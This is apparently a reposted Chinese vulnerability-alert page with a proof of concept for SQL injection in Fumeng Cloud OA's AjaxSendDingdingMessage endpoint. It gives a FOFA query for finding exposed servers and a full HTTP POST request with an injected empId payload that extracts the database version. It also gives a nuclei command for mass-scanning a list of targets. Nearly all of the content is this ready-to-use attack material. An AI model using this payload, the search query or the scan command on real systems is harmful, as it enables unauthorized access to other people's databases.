孚盟云oa ajaxsenddingdingmessage sql注入漏洞 PoC

admin 2024年9月27日14:49:59评论28 views字数 686阅读2分17秒阅读模式

0x02 漏洞描述

孚盟云oa ajaxsenddingdingmessage 存在sql注入漏洞。

孚盟云oa ajaxsenddingdingmessage sql注入漏洞 PoC

0x03 漏洞复现

fofa-query: body="hidLicResult" && body="hidProductID"

1.执行poc进行数据库版本查询,得到结果

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1Host: Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequestContent-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

孚盟云oa ajaxsenddingdingmessage sql注入漏洞 PoC

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t fumengyun-oa-ajaxsenddingdingmessage-sqli.yaml -l subs.txt -stats

孚盟云oa ajaxsenddingdingmessage sql注入漏洞 PoC

   

原文始发于微信公众号(融云攻防实验室):漏洞预警 孚盟云oa ajaxsenddingdingmessage sql注入漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月27日14:49:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   孚盟云oa ajaxsenddingdingmessage sql注入漏洞 PoChttp://cn-sec.com/archives/3210329.html

发表评论

匿名网友 填写信息